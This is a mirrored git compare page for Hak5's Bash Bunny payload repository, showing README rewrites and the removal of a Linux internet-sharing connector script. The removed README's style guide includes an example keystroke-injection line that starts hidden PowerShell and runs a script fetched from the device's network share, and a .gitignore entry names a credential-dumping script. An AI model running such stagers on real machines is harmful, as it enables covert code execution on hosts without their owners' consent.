mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
Compare commits
45 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
2bba8664e7 | ||
|
|
f582f57a34 | ||
|
|
f3cb607e0e | ||
|
|
53aaa4d1c0 | ||
|
|
342a2299c4 | ||
|
|
e3c4e45e29 | ||
|
|
20ca26ee74 | ||
|
|
3b368fe23e | ||
|
|
1839f3e760 | ||
|
|
4ecfbf665e | ||
|
|
f214a3adf9 | ||
|
|
83e5702639 | ||
|
|
b2731e7e97 | ||
|
|
937ecc7e8b | ||
|
|
5b14682936 | ||
|
|
f451511363 | ||
|
|
d92eef0e32 | ||
|
|
6295445794 | ||
|
|
377a5bc7b4 | ||
|
|
a764a9e238 | ||
|
|
5e1dbdb489 | ||
|
|
17ef1c0099 | ||
|
|
37de2446e3 | ||
|
|
759b114db9 | ||
|
|
1e1e9cfcb1 | ||
|
|
faf0c7411e | ||
|
|
c2d79df555 | ||
|
|
67527e8ce0 | ||
|
|
39b0d2887a | ||
|
|
37d8415e0e | ||
|
|
1b4af72c46 | ||
|
|
98b9d9fc37 | ||
|
|
2f18d8a328 | ||
|
|
5fc5a3b0b5 | ||
|
|
2dbb38e372 | ||
|
|
02f90b6b46 | ||
|
|
8947bcfb8e | ||
|
|
125a5fff62 | ||
|
|
e86e64c21c | ||
|
|
49b157156d | ||
|
|
dfdc89f773 | ||
|
|
91bea999f6 | ||
|
|
f9e73fb7c1 | ||
|
|
5268568869 | ||
|
|
8047cb218a |
1
.gitignore
vendored
1
.gitignore
vendored
@@ -1,4 +1,3 @@
|
||||
.DS_Store
|
||||
/.project
|
||||
/payloads/library/DumpCreds_2.0/PS/Invoke-M1m1d0gz.ps1
|
||||
bunny_connecter_config.txt
|
||||
|
||||
295
README.md
295
README.md
@@ -1,290 +1,9 @@
|
||||
# Payload Library for the [Bash Bunny](https://shop.hak5.org/products/bash-bunny) by [Hak5](https://hak5.org)
|
||||
# Payload Library for the Bash Bunny by Hak5
|
||||
|
||||
This repository contains payloads and extensions for the Hak5 Bash Bunny. Community developed payloads are listed and developers are encouraged to create pull requests to make changes to or submit new payloads.
|
||||

|
||||
|
||||
**Payloads here are written in official DuckyScript™ and Bash specifically for the Bash Bunny. Hak5 does NOT guarantee payload functionality.** <a href="#legal"><b>See Legal and Disclaimers</b></a>
|
||||
|
||||
<div align="center">
|
||||
<img src="https://img.shields.io/github/forks/hak5/bashbunny-payloads?style=for-the-badge"/>
|
||||
|
||||
<img src="https://img.shields.io/github/stars/hak5/bashbunny-payloads?style=for-the-badge"/>
|
||||
<br/>
|
||||
<img src="https://img.shields.io/github/commit-activity/y/hak5/bashbunny-payloads?style=for-the-badge">
|
||||
<img src="https://img.shields.io/github/contributors/hak5/bashbunny-payloads?style=for-the-badge">
|
||||
</div>
|
||||
<br/>
|
||||
<p align="center">
|
||||
<a href="https://payloadhub.com"><img src="https://cdn.shopify.com/s/files/1/0068/2142/files/payloadhub.png?v=1652474600"></a>
|
||||
<br/>
|
||||
<a href="https://payloadhub.com/blogs/payloads/tagged/bash-bunny">View Featured Bash Bunny Payloads and Leaderboard</a>
|
||||
<br/><i>Get your payload in front of thousands. Enter to win over $2,000 in prizes in the <a href="https://hak5.org/pages/payload-awards">Hak5 Payload Awards!</a></i>
|
||||
</p>
|
||||
|
||||
<div align="center">
|
||||
<a href="https://hak5.org/discord"><img src="https://img.shields.io/discord/506629366659153951?label=Hak5%20Discord&style=for-the-badge"></a>
|
||||
|
||||
<a href="https://youtube.com/hak5"><img src="https://img.shields.io/youtube/channel/views/UC3s0BtrBJpwNDaflRSoiieQ?label=YouTube%20Views&style=for-the-badge"/></a>
|
||||
|
||||
<a href="https://youtube.com/hak5"><img src="https://img.shields.io/youtube/channel/subscribers/UC3s0BtrBJpwNDaflRSoiieQ?style=for-the-badge"/></a>
|
||||
|
||||
<a href="https://twitter.com/hak5"><img src="https://img.shields.io/badge/follow-%40hak5-1DA1F2?logo=twitter&style=for-the-badge"/></a>
|
||||
|
||||
<a href="https://instagram.com/hak5gear"><img src="https://img.shields.io/badge/Instagram-E4405F?style=for-the-badge&logo=instagram&logoColor=white"/></a>
|
||||
<br/><br/>
|
||||
|
||||
</div>
|
||||
|
||||
|
||||
# Table of contents
|
||||
<details open>
|
||||
<ul>
|
||||
<li><a href="#about-the-bash-bunny">About the Bash Bunny</a></li>
|
||||
<li><a href="#build-your-payloads-with-payloadstudio">PayloadStudio (Editor + Compiler)</a></li>
|
||||
<li><b><a href="#contributing">Contributing Payloads</a></b></li>
|
||||
<li><a href="#legal"><b>Legal and Disclaimers</b></a></li>
|
||||
</ul>
|
||||
</details>
|
||||
|
||||
|
||||
## Shop
|
||||
- [Bash Bunny Mark II](https://shop.hak5.org/products/bash-bunny "Purchase the Bash Bunny")
|
||||
- [PayloadStudio Pro](https://hak5.org/products/payload-studio-pro "Purchase PayloadStudio Pro")
|
||||
- [Shop All Hak5 Tools](https://shop.hak5.org "Shop All Hak5 Tools")
|
||||
## Getting Started
|
||||
- [Build Payloads with PayloadStudio](#build-your-payloads-with-payloadstudio) | [Getting STARTED](https://docs.hak5.org/bash-bunny/beginner-guides/ "QUICK START GUIDE") | [Your First Payload](https://docs.hak5.org/bash-bunny/writing-payloads/payload-development-basics)
|
||||
## Documentation / Learn More
|
||||
- [Documentation](https://docs.hak5.org/bash-bunny/ "Documentation")
|
||||
|
||||
## Community
|
||||
*Got Questions? Need some help? Reach out:*
|
||||
- [Discord](https://hak5.org/discord/ "Discord") | [Forums](https://forums.hak5.org/forum/92-bash-bunny/ "Forums")
|
||||
|
||||
|
||||
## Additional Links
|
||||
<b> Follow the creators </b><br/>
|
||||
<p>
|
||||
<b>Korben's Socials</b><br/>
|
||||
<a href="https://twitter.com/notkorben"><img src="https://img.shields.io/twitter/follow/notkorben?style=social"/></a>
|
||||
<a href="https://instagram.com/hak5korben"><img src="https://img.shields.io/badge/Instagram-Follow%20@hak5korben-E1306C"/></a>
|
||||
<br/>
|
||||
<b>Darren's Socials</b><br/>
|
||||
<a href="https://twitter.com/hak5darren"><img src="https://img.shields.io/twitter/follow/hak5darren?style=social"/></a>
|
||||
<a href="https://instagram.com/hak5darren"><img src="https://img.shields.io/badge/Instagram-Follow%20@hak5darren-E1306C"/></a>
|
||||
</p>
|
||||
|
||||
<br/>
|
||||
<h1><a href="https://shop.hak5.org/products/bash-bunny">About the Bash Bunny</a></h1>
|
||||
|
||||
Linux machine in a USB. By emulating combinations of trusted USB devices — like gigabit Ethernet, serial, flash storage and keyboards — the Bash Bunny tricks computers into divulging data, exfiltrating documents, installing backdoors and many more exploits.
|
||||
|
||||
|
||||
<b><div align="center">
|
||||
<br/>
|
||||
<br/><br/>
|
||||
</div></b>
|
||||
|
||||
<p align="center">
|
||||
<a href="https://www.youtube.com/watch?v=-UmvZdDxCiI">
|
||||
<img src="https://downloads.hak5.org/assets/images/productphotos/bash_bunny_mk2.png" width="500"/>
|
||||
</a>
|
||||
<br/>
|
||||
</p>
|
||||
|
||||
|
||||
<p align="center">
|
||||
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/bb_icon3_160x160.png?v=1624506236" alt="image">
|
||||
</p>
|
||||
|
||||
## <div align="center">ADVANCED ATTACKS </div>
|
||||
|
||||
For the sake of convenience, computers trust a number of devices. Flash drives, Ethernet adapters, serial devices and keyboards to name a few. These have become mainstays of modern computing. Each has their own unique attack vectors. When combined? The possibilities are limitless. The Bash Bunny is all of these things, alone – or in combination – and more!
|
||||
|
||||
<p align="center">
|
||||
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/bb_icon2_160x160.png?v=1624506369" alt="image">
|
||||
</p>
|
||||
|
||||
## <div align="center">SIMPLE PAYLOADS </div>
|
||||
|
||||
Each attack, or payload, is written in a simple Ducky Script™ language consisting of text files. This repository is home to a growing library of community developed payloads. Staying up to date with all of the latest attacks is just a matter of downloading files from git. Then loading ’em onto the Bash Bunny just as you would any ordinary flash drive.
|
||||
|
||||
<p align="center">
|
||||
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/bb_icon1_160x160.png?v=1624506437" alt="image">
|
||||
</p>
|
||||
|
||||
## <div align="center">SIMPLE POWERFUL HARDWARE </div>
|
||||
|
||||
It's a full featured Linux box that'll run your favorite tools even faster now thanks to the optimized quad-core CPU, desktop-class SSD and doubled RAM. Choose and monitor payloads with the selection switch and RGB LED. Access an unlocked root terminal via dedicated Serial console. Exfiltrate gigs of loot via MicroSD. Even remotely trigger or geofence payloads via Bluetooth.
|
||||
|
||||
|
||||
<h1><a href="https://payloadstudio.hak5.org">Build your payloads with PayloadStudio</a></h1>
|
||||
<p align="center">
|
||||
Take your DuckyScript™ payloads to the next level with this full-featured,<b> web-based (entirely client side) </b> development environment.
|
||||
<br/>
|
||||
<a href="https://payloadstudio.hak5.org"><img width="500px" src="https://cdn.shopify.com/s/files/1/0068/2142/products/payload-studio-icon_2000x.png"></a>
|
||||
<br/>
|
||||
<i>Payload studio features all of the conveniences of a modern IDE, right from your browser. From syntax highlighting and auto-completion to live error-checking and repo synchronization - building payloads for Hak5 hotplug tools has never been easier!
|
||||
<br/><br/>
|
||||
Supports your favorite Hak5 gear - USB Rubber Ducky, Bash Bunny, Key Croc, Shark Jack, Packet Squirrel & LAN Turtle!
|
||||
<br/><br/></i><br/>
|
||||
<a href="https://hak5.org/products/payload-studio-pro">Become a PayloadStudio Pro</a> and <b> Unleash your hacking creativity! </b>
|
||||
<br/>
|
||||
OR
|
||||
<br/>
|
||||
<a href="https://payloadstudio.hak5.org/community/"> Try Community Edition FREE</a>
|
||||
<br/><br/>
|
||||
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/themes1_1_600x.gif?v=1659642557">
|
||||
<br/>
|
||||
<i> Payload Studio Themes Preview GIF </i>
|
||||
<br/><br/>
|
||||
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/AUTOCOMPLETE3_600x.gif?v=1659640513">
|
||||
<br/>
|
||||
<i> Payload Studio Autocomplete Preview GIF </i>
|
||||
</p>
|
||||
|
||||
|
||||
## Disclaimer
|
||||
Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution.
|
||||
|
||||
<h1><a href='https://payloadhub.com'>Contributing</a></h1>
|
||||
|
||||
<p align="center">
|
||||
<a href="https://payloadhub.com"><img src="https://cdn.shopify.com/s/files/1/0068/2142/files/payloadhub.png?v=1652474600"></a>
|
||||
<br/>
|
||||
<a href="https://payloadhub.com">View Featured Payloads and Leaderboard </a>
|
||||
</p>
|
||||
|
||||
# Please adhere to the following best practices and style guides when submitting a payload.
|
||||
|
||||
Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publically available.
|
||||
|
||||
Please include all resources required for the payload to run. If needed, provide a README.md in the root of your payload's directory to explain things such as intended use, required configurations, or anything that will not easily fit in the comments of the payload.txt itself. Please make sure that your payload is tested, and free of errors. If your payload contains (or is based off of) the work of other's please make sure to cite their work giving proper credit.
|
||||
|
||||
|
||||
### Purely Destructive payloads will not be accepted. No, it's not "just a prank".
|
||||
Subject to change. Please ensure any submissions meet the [latest version](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md) of these standards before submitting a Pull Request.
|
||||
|
||||
|
||||
|
||||
## Naming Conventions
|
||||
Please give your payload a unique, descriptive and appropriate name. Do not use spaces in payload, directory or file names. Each payload should be submit into its own directory, with `-` or `_` used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category.
|
||||
|
||||
## Staged Payloads
|
||||
"Staged payloads" are payloads that **download** code from some resource external to the payload.txt.
|
||||
|
||||
While staging code used in payloads is often useful and appropriate, using this (or another) github repository as the means of deploying those stages is not. This repository is **not a CDN for deployment on target systems**.
|
||||
|
||||
Staged code should be copied to and hosted on an appropriate server for doing so **by the end user** - Github and this repository are simply resources for sharing code among developers and users.
|
||||
See: [GitHub acceptable use policies](https://docs.github.com/en/site-policy/acceptable-use-policies/github-acceptable-use-policies#5-site-access-and-safety)
|
||||
|
||||
Additionally, any source code that is intended to be staged **(by the end user on the appropriate infrastructure)** should be included in any payload submissions either in the comments of the payload itself or as a seperate file. **Links to staged code are unacceptable**; not only for the reasons listed above but also for version control and user safety reasons. Arbitrary code hidden behind some pre-defined external resource via URL in a payload could be replaced at any point in the future unbeknownst to the user -- potentially turning a harmless payload into something dangerous.
|
||||
|
||||
### Including URLs
|
||||
URLs used for retrieving staged code should refer exclusively to **example.com** using a bash variable in any payload submissions [see Payload Configuration section below](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md#payload-configuration).
|
||||
|
||||
### Staged Example
|
||||
|
||||
**Example scenario: your payload downloads a script and the executes it on a target machine.**
|
||||
- Include the script in the directory with your payload
|
||||
- Provide instructions for the user to move the script to the appropriate hosting service.
|
||||
- Provide a bash variable with the placeholder example.com for the user to easily configure once they have hosted the script
|
||||
|
||||
[Simple Example of this style of payload](https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/library/exfiltration/Printer-Recon)
|
||||
|
||||
## Payload Configuration
|
||||
Be sure to take the following into careful consideration to ensure your payload is easily tested, used and maintained.
|
||||
In many cases, payloads will require some level of configuration **by the end payload user**.
|
||||
|
||||
- Abstract configuration(s) for ease of use. Use bash assignment variables where possible.
|
||||
- Remember to use PLACEHOLDERS for configurable portions of your payload - do not share your personal URLs, API keys, Passphrases, etc...
|
||||
- URLs to staged payloads SHOULD NOT BE INCLUDED. URLs should be replaced by example.com. Provide instructions on how to specific resources should be hosted on the appropriate infrastructure.
|
||||
- Make note of both REQUIRED and OPTIONAL configuration(s) in your payload using bash comments at the top of your payload or "inline" where applicable.
|
||||
|
||||
```
|
||||
Example:
|
||||
BEGINNING OF PAYLOAD
|
||||
... Payload Documentation...
|
||||
|
||||
# CONFIGURATION
|
||||
# REQUIRED - Provide URL used for Example
|
||||
MY_TARGET_URL="example.com"
|
||||
|
||||
# OPTIONAL - How long until payload starts; default 5s
|
||||
BOOT_DELAY="5000"
|
||||
|
||||
QUACK DELAY $BOOT_DELAY
|
||||
...
|
||||
QUACK STRING $MY_TARGET_URL
|
||||
...
|
||||
```
|
||||
|
||||
## Payload Documentation
|
||||
Payloads should begin with `#` bash comments specifying the title of the payload, the author, the target, and a brief description.
|
||||
|
||||
```
|
||||
Example:
|
||||
BEGINNING OF PAYLOAD
|
||||
|
||||
# Title: Example Payload
|
||||
# Author: Korben Dallas
|
||||
# Description: Opens hidden powershell and
|
||||
# Target: Windows 10
|
||||
# Props: Hak5, Darren Kitchen, Korben
|
||||
# Version: 1.0
|
||||
# Category: General
|
||||
```
|
||||
|
||||
|
||||
### Binaries
|
||||
Binaries may not be accepted in this repository. If a binary is used in conjunction with the payload, please document where it or its source may be obtained.
|
||||
|
||||
|
||||
### Configuration Options
|
||||
Configurable options should be specified in variables at the top of the payload.txt file
|
||||
|
||||
# Options
|
||||
RESPONDER_OPTIONS="-w -r -d -P"
|
||||
LOOTDIR=/root/udisk/loot/quickcreds
|
||||
|
||||
### LED
|
||||
The payload should use common payload states rather than unique color/pattern combinations when possible with an LED command preceding the Stage or ATTACKMODE.
|
||||
|
||||
# Initialization
|
||||
LED SETUP
|
||||
GET SWITCH_POSITION
|
||||
GET HOST_IP
|
||||
|
||||
# Attack
|
||||
LED ATTACK
|
||||
ATTACKMODE HID ECM_ETHERNET
|
||||
|
||||
### Stages and States
|
||||
Stages should be documented with comments
|
||||
|
||||
# Keystroke Injection Stage
|
||||
# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 when available
|
||||
GET HOST_IP
|
||||
LED STAGE1
|
||||
ATTACKMODE HID
|
||||
RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"while (\$true) { If (Test-Connection $HOST_IP -count 1) { \\\\$HOST_IP\\s\\s.ps1; exit } }\""
|
||||
|
||||
Common payload states include a `SETUP`, with may include a `FAIL` if certain conditions are not met. This is typically followed by either a single `ATTACK` or multiple `STAGEs`. More complex payloads may include a `SPECIAL` function to wait until certain conditions are met. Payloads commonly end with a `CLEANUP` phase, such as moving and deleting files or stopping services. A payload may `FINISH` when the objective is complete and the device is safe to eject or turn off. These common payload states correspond to `LED` states.
|
||||
|
||||
<h1><a href="https://hak5.org/pages/policy">Legal</a></h1>
|
||||
|
||||
Payloads from this repository are provided for educational purposes only. Hak5 gear is intended for authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use.
|
||||
|
||||
Bash Bunny and DuckyScript are the trademarks of Hak5 LLC. Copyright © 2010 Hak5 LLC. All rights reserved. No part of this work may be reproduced or transmitted in any form or by any means without prior written permission from the copyright owner.
|
||||
Bash Bunny and DuckyScript are subject to the Hak5 license agreement (https://hak5.org/license)
|
||||
DuckyScript is the intellectual property of Hak5 LLC for the sole benefit of Hak5 LLC and its licensees. To inquire about obtaining a license to use this material in your own project, contact us. Please report counterfeits and brand abuse to legal@hak5.org.
|
||||
This material is for education, authorized auditing and analysis purposes where permitted subject to local and international laws. Users are solely responsible for compliance. Hak5 LLC claims no responsibility for unauthorized or unlawful use.
|
||||
Hak5 LLC products and technology are only available to BIS recognized license exception ENC favorable treatment countries pursuant to US 15 CFR Supplement No 3 to Part 740.
|
||||
|
||||
See also:
|
||||
|
||||
[Hak5 Software License Agreement](https://shop.hak5.org/pages/software-license-agreement)
|
||||
|
||||
[Terms of Service](https://shop.hak5.org/pages/terms-of-service)
|
||||
|
||||
# Disclaimer
|
||||
<h3><b>As with any script, you are advised to proceed with caution.</h3></b>
|
||||
<h3><b>Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness.</h3></b>
|
||||
* [Purchase at HakShop.com](https://hakshop.com/products/bash-bunny "Purchase at HakShop.com")
|
||||
* [Documentation and Wiki](https://wiki.bashbunny.com/#!index.md "Documentation and Wiki")
|
||||
* [Bash Bunny Forums](https://forums.hak5.org/index.php?/forum/92-bash-bunny/ "Bash Bunny Forums")
|
||||
* IRC: irc.hak5.org #BashBunny
|
||||
* Discord: https://discord.gg/WuteWPf
|
||||
|
||||
@@ -1,321 +0,0 @@
|
||||
#!/bin/bash
|
||||
# Bash Bunny Connector for Linux
|
||||
# EULA https://www.bashbunny.com/licence/eula.txt
|
||||
# License https://www.bashbunny.com/licence/software_licence.txt
|
||||
|
||||
bbver=1
|
||||
BBSH_CONFIG="$(dirname $0)/bunny_connecter_config.txt"
|
||||
|
||||
if [ "$EUID" -ne 0 ]
|
||||
then echo "This Bash Bunny Connection script requires root."
|
||||
sudo su -s "$0"
|
||||
exit
|
||||
fi
|
||||
|
||||
function banner {
|
||||
# Show random banner because 1337
|
||||
b=$(( ( RANDOM % 5 ) + 1 ))
|
||||
case "$b" in
|
||||
1)
|
||||
echo $(tput setaf 3)
|
||||
echo " _____ _____ _____ _____ _____ _____ _____ _____ __ __ ";
|
||||
echo " (\___/) | __ || _ || __|| | | | __ || | || | || | || | |";
|
||||
echo " (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|";
|
||||
echo " (\")_(\") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| ";
|
||||
echo " Bash Bunny by Hak5 USB Attack/Automation Platform ";
|
||||
echo "$(tput sgr0) v$bbver";
|
||||
;;
|
||||
2)
|
||||
echo $(tput setaf 3)
|
||||
echo " _____ _____ _____ _____ _____ _____ _____ _____ __ __ ";
|
||||
echo " (\___/) | __ || _ || __|| | | | __ || | || | || | || | |";
|
||||
echo " (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|";
|
||||
echo " (\")_(\") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| ";
|
||||
echo " Bash Bunny by Hak5 USB Attack/Automation Platform ";
|
||||
echo "$(tput sgr0) v$bbver";
|
||||
;;
|
||||
3)
|
||||
echo $(tput setaf 3)
|
||||
echo " _____ _____ _____ _____ _____ _____ _____ _____ __ __ ";
|
||||
echo " (\___/) | __ || _ || __|| | | | __ || | || | || | || | |";
|
||||
echo " (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|";
|
||||
echo " (\")_(\") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| ";
|
||||
echo " Bash Bunny by Hak5 USB Attack/Automation Platform ";
|
||||
echo "$(tput sgr0) v$bbver";
|
||||
;;
|
||||
4)
|
||||
echo $(tput setaf 3)
|
||||
echo " _____ _____ _____ _____ _____ _____ _____ _____ __ __ ";
|
||||
echo " (\___/) | __ || _ || __|| | | | __ || | || | || | || | |";
|
||||
echo " (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|";
|
||||
echo " (\")_(\") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| ";
|
||||
echo " Bash Bunny by Hak5 USB Attack/Automation Platform ";
|
||||
echo "$(tput sgr0) v$bbver";
|
||||
;;
|
||||
5)
|
||||
echo $(tput setaf 3)
|
||||
echo " _____ _____ _____ _____ _____ _____ _____ _____ __ __ ";
|
||||
echo " (\___/) | __ || _ || __|| | | | __ || | || | || | || | |";
|
||||
echo " (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|";
|
||||
echo " (\")_(\") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| ";
|
||||
echo " Bash Bunny by Hak5 USB Attack/Automation Platform ";
|
||||
echo "$(tput sgr0) v$bbver";
|
||||
;;
|
||||
esac
|
||||
}
|
||||
|
||||
function showsettings {
|
||||
printf "\n\
|
||||
$(tput bold)Saved Settings$(tput sgr0): Share Internet connection from $sbunnywan\n\
|
||||
to Bash Bunny at $sbunnylan through default gateway $sbunnygw\n"
|
||||
}
|
||||
|
||||
function menu {
|
||||
start_clean # removes bunny related rules without doing a full flush
|
||||
printf "\n\
|
||||
[$(tput bold)C$(tput sgr0)]onnect using saved settings\n\
|
||||
[$(tput bold)G$(tput sgr0)]uided setup (recommended)\n\
|
||||
[$(tput bold)M$(tput sgr0)]anual setup\n\
|
||||
[$(tput bold)A$(tput sgr0)]dvanced IP settings\n\
|
||||
[$(tput bold)Q$(tput sgr0)]uit\n\n "
|
||||
read -r -sn1 key
|
||||
case "$key" in
|
||||
[gG]) guidedsetup;;
|
||||
[mM]) manualsetup;;
|
||||
[cC]) connectsaved;;
|
||||
[aA]) advancedsetup;;
|
||||
[bB]) bunny;;
|
||||
[qQ]) printf "\n"; start_clean; exit;;
|
||||
esac
|
||||
}
|
||||
|
||||
function manualsetup {
|
||||
ipinstalled=$(which ip)
|
||||
if [[ "$?" == 0 ]]; then
|
||||
ifaces=($(ip link show | grep -v link | awk {'print $2'} | sed 's/://g' | grep -v lo))
|
||||
printf "\n Select Bash Bunny Interface:\n"
|
||||
for i in "${!ifaces[@]}"; do
|
||||
printf " [$(tput bold)%s$(tput sgr0)]\t%s\t" "$i" "${ifaces[$i]}"
|
||||
printf "$(ip -4 addr show ${ifaces[$i]} | grep inet | awk {'print $2'} | head -1)\n"
|
||||
done
|
||||
read -r -p " > " planq
|
||||
if [ "$planq" -eq "$planq" ] 2>/dev/null; then
|
||||
sbunnylan=(${ifaces[planq]})
|
||||
else
|
||||
printf "\n Response must be a listed numeric option\n"; manualsetup
|
||||
fi
|
||||
printf "\n Select Internet Interface:\n"
|
||||
for i in "${!ifaces[@]}"; do
|
||||
printf " [$(tput bold)%s$(tput sgr0)]\t%s\t" "$i" "${ifaces[$i]}"
|
||||
printf "$(ip -4 addr show ${ifaces[$i]} | grep inet | awk {'print $2'} | head -1)\n"
|
||||
done
|
||||
read -r -p " > " inetq
|
||||
if [ "$inetq" -eq "$inetq" ] 2>/dev/null; then
|
||||
sbunnywan=(${ifaces[inetq]})
|
||||
else
|
||||
printf "\n Response must be a listed numeric option\n"; manualsetup
|
||||
fi
|
||||
printf "\n$(netstat -nr)\n\n"
|
||||
read -r -p " Specify Default Gateway IP Address: " sbunnygw
|
||||
savechanges
|
||||
else
|
||||
printf "\n\n Configuration requires the 'iproute2' package (aka the 'ip' command).\n Please install 'iproute2' to continue.\n"
|
||||
menu
|
||||
fi
|
||||
}
|
||||
|
||||
function guidedsetup {
|
||||
hasiproute2=$(which ip)
|
||||
if [[ "$?" == 1 ]]; then
|
||||
printf "\n\n Configuration requires the 'iproute2' package (aka the 'ip' command).\n Please install 'iproute2' to continue.\n"; menu
|
||||
fi
|
||||
hasdefaultroute=$(ip route)
|
||||
if [[ "$?" == 1 ]]; then
|
||||
printf "\n No route detected. Check connection and try again.\n"; menu
|
||||
fi
|
||||
|
||||
printf "\n $(tput setaf 3)Step 1 of 3: Select Default Gateway$(tput sgr0)\n\
|
||||
Default gateway reported as $(tput bold)$(ip route | grep default | awk {'print $3'} | head -1)$(tput sgr0)\n"
|
||||
read -r -p " Use the above reported default gateway? [Y/n]? " usedgw
|
||||
case $usedgw in
|
||||
[yY][eE][sS]|[yY]|'')
|
||||
sbunnygw=($(ip route | grep default | awk {'print $3'}))
|
||||
;;
|
||||
[nN][oO]|[nN])
|
||||
printf "\n$(ip route)\n\n"
|
||||
read -r -p " Specify the default gateway by IP address: " sbunnygw
|
||||
;;
|
||||
esac
|
||||
|
||||
printf "\n $(tput setaf 3)Step 2 of 3: Select Internet Interface$(tput sgr0)\n\
|
||||
Internet interface reported as $(tput bold)$(ip route | grep default | awk {'print $5'} | head -1)$(tput sgr0)\n"
|
||||
read -r -p " Use the above reported Internet interface? [Y/n]? " useii
|
||||
case $useii in
|
||||
[yY][eE][sS]|[yY]|'')
|
||||
sbunnywan=($(ip route | grep default | awk {'print $5'}))
|
||||
;;
|
||||
[nN][oO]|[nN])
|
||||
printf "\n Available Network Interfaces:\n"
|
||||
ifaces=($(ip link show | grep -v link | awk {'print $2'} | sed 's/://g' | grep -v lo))
|
||||
for i in "${!ifaces[@]}"; do
|
||||
printf " \t%s\t" "${ifaces[$i]}"
|
||||
printf "$(ip -4 addr show ${ifaces[$i]} | grep inet | awk {'print $2'} | head -1)\n"
|
||||
done
|
||||
read -r -p " Specify the internet interface by name: " sbunnywan
|
||||
;;
|
||||
esac
|
||||
|
||||
printf "\n $(tput setaf 3)Step 3 of 3: Select Bash Bunny Interface$(tput sgr0)\n Please connect the Bash Bunny to this computer.\n "
|
||||
|
||||
a="0"
|
||||
until bunnyiface=$(ip addr | grep '00:11:22:33:44:55' -B1 | awk {'print $2'} | head -1 | grep 'eth\|en')
|
||||
do
|
||||
printf "."
|
||||
sleep 1
|
||||
a=$[$a+1]
|
||||
if [[ $a == "51" ]]; then
|
||||
printf "\n "
|
||||
a=0
|
||||
fi
|
||||
done
|
||||
printf "[Checking]"
|
||||
sleep 5 # Wait as the system is likely to rename interface. Sleeping rather than more advanced error handling becasue reasons.
|
||||
bunnyiface=$(ip addr | grep '00:11:22:33:44:55' -B1 | awk {'print $2'} | head -1 | grep 'eth\|en' | sed 's/://g')
|
||||
printf "\n Detected Bash Bunny on interface $(tput bold)$bunnyiface$(tput sgr0)\n";
|
||||
read -r -p " Use the above detected Bash Bunny interface? [Y/n]? " pi
|
||||
case $pi in
|
||||
[yY][eE][sS]|[yY]|'')
|
||||
sbunnylan=$bunnyiface
|
||||
;;
|
||||
[nN][oO]|[nN])
|
||||
printf "\n Available Network Interfaces:\n"
|
||||
ifaces=($(ip link show | grep -v link | awk {'print $2'} | sed 's/://g' | grep -v lo))
|
||||
for i in "${!ifaces[@]}"; do
|
||||
printf " \t%s\t" "${ifaces[$i]}"
|
||||
printf "$(ip -4 addr show ${ifaces[$i]} | grep inet | awk {'print $2'} | head -1)\n"
|
||||
done
|
||||
read -r -p " Specify the Bash Bunny interface by name: " sbunnylan
|
||||
;;
|
||||
esac
|
||||
savechanges
|
||||
}
|
||||
|
||||
function advancedsetup {
|
||||
printf "\n\
|
||||
By default the Bash Bunny resides on the $(tput bold)172.16.64.0/24$(tput sgr0) network\n\
|
||||
with the IP Address $(tput bold)172.16.64.1$(tput sgr0) and Ethernet default route $(tput bold)172.16.64.64$(tput sgr0).\n\n\
|
||||
The Bash Bunny expects an Internet connection from 172.16.64.64 by\n\
|
||||
default, which this script aids in configuring. These IP addresses may\n\
|
||||
be changed if desired by modifying network configs on the Bash Bunny.\n\n"
|
||||
read -r -p " Continue with advanced IP config [y/N]? " qcontinue
|
||||
case $qcontinue in
|
||||
[nN][oO]|[nN]|'') menu ;;
|
||||
[yY][eE][sS]|[yY])
|
||||
read -r -p " Bash Bunny Network [172.16.42.0/24]: " sbunnynet
|
||||
if [[ $sbunnynet == '' ]]; then
|
||||
sbunnynet=172.16.64.0/24 # Bash Bunny network. Default is 172.16.64.0/24
|
||||
fi
|
||||
read -r -p " Bash Bunny Netmask [255.255.255.0]: " sbunnynmask
|
||||
if [[ $sbunnynmask == '' ]]; then
|
||||
sbunnynmask=255.255.255.0 #Default netmask for /24 network
|
||||
fi
|
||||
read -r -p " Host IP Address [172.16.42.42]: " sbunnyhostip
|
||||
if [[ $sbunnyhostip == '' ]]; then
|
||||
sbunnyhostip=172.16.64.64 #IP Address of host computer
|
||||
fi
|
||||
read -r -p " Bash Bunny IP Address [172.16.42.1]: " sbunnyip
|
||||
if [[ $sbunnyip == '' ]]; then
|
||||
sbunnyip=172.16.64.1 #If this seems familiar it's becuase I'm just recycling wp6.sh from the WiFi Pineapple
|
||||
fi
|
||||
